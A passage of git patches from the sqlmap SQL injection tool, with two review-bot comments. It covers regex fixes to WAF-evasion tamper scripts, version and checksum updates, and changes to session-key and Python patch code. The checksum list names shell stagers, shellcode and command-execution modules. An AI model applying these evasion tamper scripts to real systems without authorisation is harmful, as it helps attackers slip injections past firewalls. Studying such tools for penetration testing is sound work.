== payload: match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*(\w+)\s*", payload) diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py index 0fdc180e66a..17525286e2f 100644 --- a/tamper/commentbeforeparentheses.py +++ b/tamper/commentbeforeparentheses.py 
@@ -35,6 +35,6 @@ def tamper(payload, **kwargs): retVal = payload if payload: - retVal = re.sub(r"\b(\w+)\(", "\g<1>/**/(", retVal) + retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal) return retVal diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index cec299ed705..57c3f5460dc 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -22,6 +22,6 @@ def tamper(payload, **kwargs): retVal = payload if payload: - retVal = re.sub(r"(?i)(information_schema)\.", "\g<1>/**/.", payload) + retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload) return retVal diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index b00a0b1b8c2..40a2b033c06 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -43,7 +43,7 @@ def tamper(payload, **kwargs): words.add(word) for word in words: - retVal = re.sub("(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal) - retVal = re.sub("(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal) + retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal) + retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal) return retVal diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1f0f33c6f03..84f60fc773b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -5,10 +5,10 @@ b0eb597c613afeff9d62898cf4c67a56 extra/cloak/cloak.py e0911386106b95d2ba4b12d651b2eb16 extra/dbgtool/dbgtool.py 1e5532ede194ac9c083891c2f02bca93 extra/dbgtool/__init__.py acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ -fe39e5c315d63afff5cb99ec42fc883f extra/icmpsh/icmpsh_m.py +708e9fd35dabcbfcd10e91bbc14f091f extra/icmpsh/icmpsh_m.py 2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py 1e5532ede194ac9c083891c2f02bca93 extra/__init__.py -27629e01ba722271c990ad4b27151917 extra/mssqlsig/update.py +fe141ec3178a46e7151c7f34bb747c68 extra/mssqlsig/update.py ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_ 1e5532ede194ac9c083891c2f02bca93 extra/safe2bin/__init__.py b6c0f2047e9bea90f4d5c5806c0f6a9a extra/safe2bin/safe2bin.py @@ -16,9 +16,9 @@ d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ 2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ 220745c50d375dad7aefebf8ca3611ef extra/shutils/duplicates.py -1f33abe1a67493909d29a35ca72ecedb extra/shutils/newlines.py +e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 71b9d4357c31db013ecda27433830090 extra/shutils/pylint.py -c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py +1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py 
@@ -26,13 +26,13 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -ee096e173a5caa7724e751c693880925 lib/core/agent.py +0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -59246d63fd0f8ffa6db61ff1ba0797c8 lib/core/common.py +6470770fb1296acb13c3e49a77ee0159 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -93567739d591829c1fb9ff77a50bcc87 lib/core/decorators.py +4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py 
@@ -41,16 +41,16 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -83345a6b0b7e187d2cbcc280a509f03e lib/core/option.py +718646541f2b446f40533149fc0f1b30 lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bb3cda01d9f6c71382beba250e0777fc lib/core/settings.py +c769cdd91e5adaf3c6a1cdfe24b7a544 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -6306284edcccc185b2df085438572b0d lib/core/target.py +8f8613d1a960d53655ceee0114e2b206 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -67,9 +67,9 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -62e4500ef19f7795a1443897b535b36d lib/request/basic.py +2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py +8500dfaccd8ac4a6eecbca266f6327c9 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py 
@@ -86,20 +86,20 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -2665fa7eedb19a1b10ffe949999b75f1 lib/takeover/web.py +f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py 4a7f231e597f754e9fcd116d13ad1a4d lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py -bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py +48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py -3e404b091e698cceadc1b9d2f1dae4d9 lib/utils/api.py +ecedf10e09525ac4be07bd27cbd31d81 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py @@ -116,7 +116,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py fad14adffa8b640a15b06db955031695 lib/utils/versioncheck.py -7348ee704485651737ddbe3538271be9 lib/utils/xrange.py +e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py 
@@ -225,13 +225,13 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -5c8583dd47f92935ceb41210a10eeebf sqlmap.py -b2c2cc55ba4e31bea94494dcafe5d8cc tamper/0x2char.py +2cc55aaabe5b5acb29745c3832d16aaa sqlmap.py +1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py 0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py -4d44f868c6c97ced29e306347ce5d650 tamper/between.py +9a3da4aa7b220448aa3ecbb92f68330f tamper/between.py e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py 3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py @@ -239,7 +239,7 @@ b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py 2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py 6a395de07b60f47d9474ace0a98c160f tamper/commalesslimit.py 211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py -19acfde79c9a2d8458e15182f5b73d71 tamper/commentbeforeparentheses.py +6082358eb328d1cdd4587e73c95bbefc tamper/commentbeforeparentheses.py 334e4a2485b3a1bbc1734823b93ea694 tamper/concat2concatws.py dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py 06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py 
@@ -248,13 +248,13 @@ dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py 9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py 3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py -91c92ee203e7e619cb547643883924ca tamper/informationschemacomment.py +21665e68ef9f91b2395e81d2f341412d tamper/informationschemacomment.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py de4c83d33968a0cbf00cdfd8d35deddc tamper/modsecurityversioned.py 39981d5d6cb84aca950458739102bb07 tamper/modsecurityzeroversioned.py -b4cadf2ddcdc0598c9a3bf24521a2fa1 tamper/multiplespaces.py +5ee5147612ebe4769a67a8e2305d62f7 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py @@ -400,7 +400,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py -cf979f0393523c028d8190ef6116884f waf/cloudbric.py +ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py diff --git a/waf/cloudbric.py b/waf/cloudbric.py index bbe79e5d810..94963232934 100644 --- a/waf/cloudbric.py +++ b/waf/cloudbric.py @@ -5,9 +5,6 @@ See the file 'LICENSE' for copying permission """ -import re - -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS __product__ = "Cloudbric Web Application Firewall (Cloudbric)" From 6b0633289650b13d3e8b4cb10fb24ddc0342a321 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Tue, 12 Jun 2018 22:45:16 +0200 Subject: [PATCH 167/428] Fixes #3145 --- lib/core/settings.py | 2 +- lib/core/target.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1d86bc30d6f..72907db345b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.16" +VERSION = "1.2.6.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 8e38389b94e..4ab2e2cca55 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -83,6 +83,7 @@ def _setRequestParams(): conf.parameters[None] = "direct connection" return + hintNames = [] testableParameters = False # Perform checks on GET parameters @@ -101,7 +102,6 @@ def _setRequestParams(): if conf.data is not None: conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method - hintNames = [] def process(match, repl): retVal = match.group(0) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 84f60fc773b..7ce69f98ec4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -47,10 +47,10 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c769cdd91e5adaf3c6a1cdfe24b7a544 lib/core/settings.py +8a43d5859fe5a416edcbe75f9570f909 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -8f8613d1a960d53655ceee0114e2b206 lib/core/target.py +36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 220c1be162eda2066974e74bfb6199e7d0214255 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 12 Jun 2018 23:02:38 +0200 Subject: [PATCH 168/428] Fixes #3144 --- lib/core/option.py | 12 ------------ lib/core/patch.py | 26 ++++++++++++++++++++++++++ lib/core/settings.py | 2 +- sqlmap.py | 2 ++ txt/checksum.md5 | 7 ++++--- 5 files changed, 33 insertions(+), 16 deletions(-) create mode 100644 lib/core/patch.py diff --git a/lib/core/option.py b/lib/core/option.py index 75bd66eac45..761ac15d522 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -10,7 +10,6 @@ import glob import inspect import logging -import httplib import os import random import re @@ -1816,16 +1815,6 @@ def _cleanupEnvironment(): if hasattr(socket, "_ready"): socket._ready.clear() -def _dirtyPatches(): - """ - Place for "dirty" Python related patches - """ - - httplib._MAXLINE = 1 * 1024 * 1024 # accept overly long result lines (e.g. SQLi results in HTTP header responses) - - if IS_WIN: - from thirdparty.wininetpton import win_inet_pton # add support for inet_pton() on Windows OS - def _purgeOutput(): """ Safely removes (purges) output directory. 
@@ -2633,7 +2622,6 @@ def init(): _setRequestFromFile() _cleanupOptions() _cleanupEnvironment() - _dirtyPatches() _purgeOutput() _checkDependencies() _createTemporaryDirectory() diff --git a/lib/core/patch.py b/lib/core/patch.py new file mode 100644 index 00000000000..f55ab7b4a7e --- /dev/null +++ b/lib/core/patch.py @@ -0,0 +1,26 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import codecs +import httplib + +from lib.core.settings import IS_WIN + +def dirtyPatches(): + """ + Place for "dirty" Python related patches + """ + + # accept overly long result lines (e.g. SQLi results in HTTP header responses) + httplib._MAXLINE = 1 * 1024 * 1024 + + # add support for inet_pton() on Windows OS + if IS_WIN: + from thirdparty.wininetpton import win_inet_pton + + # Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440 + codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None) diff --git a/lib/core/settings.py b/lib/core/settings.py index 72907db345b..b2e11a8d1de 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.17" +VERSION = "1.2.6.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 618ea99fb79..75272136ead 100755 --- a/sqlmap.py +++ b/sqlmap.py 
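Review bot: In the new lib/core/patch.py, `from thirdparty.wininetpton import win_inet_pton` inside dirtyPatches() binds a name that is never used, so the patch evidently relies on the module's import-time side effect; the comment above it should say so, e.g. `# import for side effect only: the module registers inet_pton on Windows`, otherwise a linter or a later cleanup will drop it as an unused import. `httplib._MAXLINE` is a private attribute of the stdlib module, so the override deserves a note that it depends on CPython httplib internals and may silently stop working on another interpreter; the docstring should also state that dirtyPatches() is meant to run before any HTTP connection is opened (sqlmap.py now calls it first in main()), since the value is presumably read when response lines are parsed. It is worth recording in the same comment that the 1 MiB value is still a hard cap on how much a single over-long response line can consume, not an unbounded read.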
@@ -57,6 +57,7 @@ from lib.core.exception import SqlmapUserQuitException from lib.core.option import initOptions from lib.core.option import init + from lib.core.patch import dirtyPatches from lib.core.settings import GIT_PAGE from lib.core.settings import IS_WIN from lib.core.settings import LEGAL_DISCLAIMER @@ -114,6 +115,7 @@ def main(): """ try: + dirtyPatches() checkEnvironment() setPaths(modulePath()) banner() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7ce69f98ec4..8898eb6dfaf 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -41,13 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -718646541f2b446f40533149fc0f1b30 lib/core/option.py +332d4bb299a0edbc42100e3cfbead285 lib/core/option.py +c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8a43d5859fe5a416edcbe75f9570f909 lib/core/settings.py +76cfa95c6b52dbdc3fb5396f8d9d57dc lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -225,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -2cc55aaabe5b5acb29745c3832d16aaa sqlmap.py +c5ecca109867f7ce4d325f487cf7badd sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py 
From 17c170e1f8bc1d46bf370665d2d9275c3cac43b5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 13 Jun 2018 23:51:09 +0200 Subject: [PATCH 169/428] Fixes #3148 --- lib/core/common.py | 4 ++-- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 39a7ae92b20..d5416f10220 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4281,7 +4281,7 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) + _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): @@ -4289,7 +4289,7 @@ def hashDBRetrieve(key, unserialize=False, checkConf=False): Helper function for restoring session data from HashDB """ - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) + _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): diff --git a/lib/core/settings.py b/lib/core/settings.py index b2e11a8d1de..fe358ed42c7 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
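Review bot: The new HashDB key in hashDBWrite drops the scheme that the old `conf.url`-based key carried and, whenever conf.path is set, the port as well, so session entries for http://host/path and https://host/path, or the same path served on two ports of one host, now resolve to the same record; if that merging is what #3148 intends, the docstrings of hashDBWrite and hashDBRetrieve should name the target attributes the key is built from so nobody is surprised by cross-target session reuse. The same key expression is duplicated in the hashDBRetrieve hunk. When conf.path is None the tuple holds the integer conf.port and `'|'.join(...)` raises TypeError, so that element needs `str(conf.port)`. hashDBRetrieve continues past its hunk.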
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.18" +VERSION = "1.2.6.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -598,7 +598,7 @@ HASHDB_END_TRANSACTION_RETRIES = 3 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism) -HASHDB_MILESTONE_VALUE = "dPHoJRQYvs" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' +HASHDB_MILESTONE_VALUE = "BZzRotigLX" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' # Warn user of possible delay due to large page dump in full UNION query injections LARGE_OUTPUT_THRESHOLD = 1024 ** 2 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8898eb6dfaf..3017db45390 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6470770fb1296acb13c3e49a77ee0159 lib/core/common.py +c18e33cda9cab13ee3838e13c713547f lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -76cfa95c6b52dbdc3fb5396f8d9d57dc lib/core/settings.py +fb320879e5b086c37527ce8f9ff2d7ce lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 756f02fb0e8deb2d7114a46123ec23bed89ffd7d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 15 Jun 2018 14:22:24 +0200 Subject: [PATCH 170/428] Fixes #3150 --- lib/core/common.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index d5416f10220..a439ba89618 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4281,7 +4281,7 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else str(conf.port), key, HASHDB_MILESTONE_VALUE)) conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): 
@@ -4289,7 +4289,7 @@ def hashDBRetrieve(key, unserialize=False, checkConf=False): Helper function for restoring session data from HashDB """ - _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else str(conf.port), key, HASHDB_MILESTONE_VALUE)) retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): diff --git a/lib/core/settings.py b/lib/core/settings.py index fe358ed42c7..7549a082899 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.19" +VERSION = "1.2.6.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3017db45390..d631ef2aba4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -c18e33cda9cab13ee3838e13c713547f lib/core/common.py +2dde54b2f690247ee715b2f5cf6c258b lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
